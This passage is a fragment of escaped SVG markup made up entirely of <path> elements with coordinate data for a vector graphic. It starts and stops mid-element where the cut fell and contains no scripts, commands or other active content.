d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path 